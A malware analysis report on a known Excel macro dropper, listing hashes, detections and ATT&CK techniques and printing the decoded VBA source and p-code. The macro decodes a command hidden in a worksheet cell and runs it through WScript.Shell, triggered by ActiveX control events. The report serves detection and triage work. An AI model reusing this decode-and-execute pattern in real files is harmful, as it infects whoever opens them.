Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 15d3edcf37b1e4d0…

MALICIOUS

Office (OLE)

79.0 KB Created: 2020-03-11 13:13:34 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: de2b9c76f2714b136fba35b0f5814e0a SHA-1: a4b003322d338ef1b5b48ddb702340a1abef7d63 SHA-256: 15d3edcf37b1e4d03a5c61c1c7752130a9899b978c94f80d8dabc45f416fc253
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

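The sample is an Excel document containing VBA macros that utilize WScript.Shell to execute commands (the extracted macro calls its Exec method; no call to the VBA Shell() function appears in the extracted source). The command string is not stored in the macro text: it is rebuilt at run time from every fourth character of a worksheet cell, so string scans of the macro source alone will not reveal it. The document body attempts to lure the user into engaging with the content, likely to encourage macro execution; in the extracted code the macro is wired to the events of two ActiveX controls on Sheet1 rather than to an auto-open procedure. The ClamAV detection indicates it is a known dropper.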

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-7617649-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7617649-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim oh As Object
        Set oh = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim oh As Object
        Set oh = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4293 bytes
SHA-256: ddfbe874649b0f7ceefcd34ce195d19c653ac5d8f3b6e3459262f267193ff4c0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' De-obfuscation helper: rebuilds a hidden string from the text of one worksheet cell.
'   k, kk - passed unchanged to Cells(k, kk), i.e. the row and column of the cell that is read.
'   aA    - upper bound of the sampling loop; slots 0, 4, 8, ... up to aA are concatenated.
' Returns the concatenated characters (assigned to the function name at the end).
' Analyst note: the payload string lives in the worksheet, not in the macro, so it can be
' recovered statically by reading that cell and keeping every 4th character.
Function text(k, kk, aA As Integer)
Dim s(): Dim u As Integer
' Cells() is unqualified here, so which sheet is read depends on the active sheet at run time
' (presumably Sheet1, where the trigger controls live - confirm against the workbook).
x = Cells(k, kk)
' Split the cell text into one character per array slot. Slots are filled from index 1;
' s(0) is never assigned by this loop.
For ci = 1 To Len(x)
    ReDim Preserve s(ci)
    s(ci) = Mid(x, ci, 1)
Next
textx = ""
' Keep only every 4th slot; the three characters between kept positions are skipped
' (presumably filler that hides the string from simple scanners).
For u = 0 To aA Step 4
textx = textx + s(u)
Next u
text = textx
End Function
' Runs sCmd through Windows Script Host and returns what the child process wrote to stdout.
'   sCmd - command line handed to WScript.Shell.Exec without any validation.
' Returns the non-empty stdout lines, each followed by vbCrLf.
' Detection note: this is the block behind the OLE_VBA_WSCRIPT / OLE_VBA_CREATEOBJ findings;
' at run time it shows up as the Office process spawning a child process.
Public Function Sdf(sCmd As String) As String


    ' Late-bound COM object, so no project reference to Windows Script Host is needed.
    Dim oh As Object
    Set oh = CreateObject("WScript.Shell")

    Dim co As Object
    Dim vre As Object
    ' Exec starts the command and exposes its standard streams; only StdOut is read here.
    Set co = oh.Exec(sCmd)
    Set vre = co.StdOut

    Dim s As String
    Dim sLine As String
    ' Read stdout until the stream ends, dropping empty lines.
    While Not vre.AtEndOfStream
        sLine = vre.ReadLine
        If sLine <> "" Then s = s & sLine & vbCrLf
    Wend

    Sdf = s

End Function
' Entry point called by both Sheet1 event handlers: decodes the hidden command and executes it.
' text(200, 10, 13748) reads the cell at row 200, column 10 (J200) and keeps every 4th
' character up to index 13748; the result is passed to Sdf, which runs it.
' The command output only goes to Debug.Print (the VBA Immediate window), so nothing is shown
' to the user. "\n" is a literal two-character string in VBA, not a newline.
' The same constants (0x00C8, 0x000A, 0x35B4) appear in the p-code dump for this line, so the
' source and compiled p-code agree here.
Function vess()
Debug.Print "" & "\n" & Sdf(text(200, 10, 13748)) '& vbCrLf
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "i, 1, 0, MSForms, Frame"
Attribute VB_Control = "Preview, 3, 1, MSForms, CommandButton"
' Layout event handler for the MSForms Frame control named "i" (declared in the VB_Control
' attributes of this module). It only forwards to ThisWorkbook.vess.
' Triage note: there is no Workbook_Open / Auto_Open procedure in the extracted code; execution
' is tied to ActiveX control events instead, so auto-exec checks should cover *_Layout handlers.
' Presumably Layout fires when the frame is rendered, without a click - confirm in a sandbox.
Private Sub i_Layout()
ThisWorkbook.vess
End Sub

' Click handler for the MSForms CommandButton named "Preview" (declared in the VB_Control
' attributes of this module). Forwards to ThisWorkbook.vess, the same entry point used by
' i_Layout, so a user clicking the button triggers the decode-and-execute chain.
Private Sub Preview_Click()
ThisWorkbook.vess
End Sub

' Processing file: /tmp/qstore_1hfmrl3y
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3425 bytes
' Line #0:
' 	FuncDefn (Function Text(k))
' Line #1:
' 	Dim 
' 	VarDefn s
' 	BoS 0x0000 
' 	Dim 
' 	VarDefn u (As Integer)
' Line #2:
' 	Ld k 
' 	Ld kk 
' 	ArgsLd Cells 0x0002 
' 	St x 
' Line #3:
' 	StartForVariable 
' 	Ld ci 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld x 
' 	FnLen 
' 	For 
' Line #4:
' 	OptionBase 
' 	Ld ci 
' 	Redim (Preserve) s 0x0001 (As Variant)
' Line #5:
' 	Ld x 
' 	Ld ci 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Ld ci 
' 	ArgsSt s 0x0001 
' Line #6:
' 	StartForVariable 
' 	Next 
' Line #7:
' 	LitStr 0x0000 ""
' 	St textx 
' Line #8:
' 	StartForVariable 
' 	Ld u 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld aA 
' 	LitDI2 0x0004 
' 	ForStep 
' Line #9:
' 	Ld textx 
' 	Ld u 
' 	ArgsLd s 0x0001 
' 	Add 
' 	St textx 
' Line #10:
' 	StartForVariable 
' 	Ld u 
' 	EndForVariable 
' 	NextVar 
' Line #11:
' 	Ld textx 
' 	St Text 
' Line #12:
' 	EndFunc 
' Line #13:
' 	FuncDefn (Public Function Sdf(sCmd As String) As String)
' Line #14:
' Line #15:
' Line #16:
' 	Dim 
' 	VarDefn oh (As Object)
' Line #17:
' 	SetStmt 
' 	LitStr 0x000D "WScript.Shell"
' 	ArgsLd CreateObject 0x0001 
' 	Set oh 
' Line #18:
' Line #19:
' 	Dim 
' 	VarDefn co (As Object)
' Line #20:
' 	Dim 
' 	VarDefn vre (As Object)
' Line #21:
' 	SetStmt 
' 	Ld sCmd 
' 	Ld oh 
' 	ArgsMemLd Exec 0x0001 
' 	Set co 
' Line #22:
' 	SetStmt 
' 	Ld co 
' 	MemLd StdOut 
' 	Set vre 
' Line #23:
' Line #24:
' 	Dim 
' 	VarDefn s (As String)
' Line #25:
' 	Dim 
' 	VarDefn sLine (As String)
' Line #26:
' 	Ld vre 
' 	MemLd AtEndOfStream 
' 	Not 
' 	While 
' Line #27:
' 	Ld vre 
' 	MemLd ReadLine 
' 	St sLine 
' Line #28:
' 	Ld sLine 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld s 
' 	Ld sLine 
' 	Concat 
' 	Ld vbCrLf 
' 	Concat 
' 	St s 
' 	EndIf 
' Line #29:
' 	Wend 
' Line #30:
' Line #31:
' 	Ld s 
' 	St Sdf 
' Line #32:
' Line #33:
' 	EndFunc 
' Line #34:
' 	FuncDefn (Function vess(id_FFFE As Variant))
' Line #35:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0000 ""
' 	LitStr 0x0002 "\n"
' 	Concat 
' 	LitDI2 0x00C8 
' 	LitDI2 0x000A 
' 	LitDI2 0x35B4 
' 	ArgsLd Text 0x0003 
' 	ArgsLd Sdf 0x0001 
' 	Concat 
' 	PrintItemNL 
' 	QuoteRem 0x0032 0x0008 "& vbCrLf"
' Line #36:
' 	EndFunc 
' Line #37:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 1857 bytes
' Line #0:
' 	FuncDefn (Sub i_Layout())
' Line #1:
' 	Ld ThisWorkbook 
' 	ArgsMemCall vess 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Sub Preview_Click())
' Line #5:
' 	Ld ThisWorkbook 
' 	ArgsMemCall vess 0x0000 
' Line #6:
' 	EndSub